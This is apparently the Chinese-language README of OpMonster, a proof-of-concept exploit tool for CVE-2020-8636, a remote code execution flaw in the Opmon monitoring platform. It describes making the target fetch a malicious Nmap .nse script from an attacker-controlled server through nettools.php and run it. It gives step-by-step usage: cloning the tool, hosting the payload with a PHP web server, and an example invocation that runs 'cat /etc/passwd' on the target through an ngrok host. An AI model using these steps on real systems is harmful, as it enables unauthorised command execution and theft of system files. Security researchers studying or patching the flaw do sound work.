OpMonster 是针对 CVE-2020-8636 的概念验证漏洞利用工具,该漏洞是 Opmon 监控平台中的一个远程代码执行漏洞。它滥用 nettools.php 端点,该端点允许使用任意 --script 选项运行 Nmap。该利用工具使 Opmon 从您控制的服务器(通过 http-fetch)获取一个恶意的 .nse Nmap 脚本,将其放入 /tmp 目录,然后运行该脚本在目标设备上执行您的命令并打印输出结果。
由 @phor3nsic 发现并开发。 更多详情:Opmon 的三个 CVE 漏洞。
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
首先,在目标可访问的主机上启动一个 Web 服务器,并确保生成的 .nse 脚本可以被下载(漏洞利用工具会将脚本写入当前目录):
php -S 0.0.0.0:1337
然后,使用四个位置参数运行漏洞利用工具:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
如果目标无法下载脚本(“不受影响”),或无法向您的服务器发起出站连接,漏洞利用工具会中止并显示相应消息。
仅供授权的安全测试和教育使用。您应对如何使用它负责。
| 参数 |
|---|
| 描述 |
|---|
HOST | 目标 Opmon 基础 URL(例如 https://vulnhost.com) |
LHOST | 您的主机地址,用于提供 .nse 脚本 |
LPORT | 您的主机端口 |
CMD | 在目标上执行的命令 |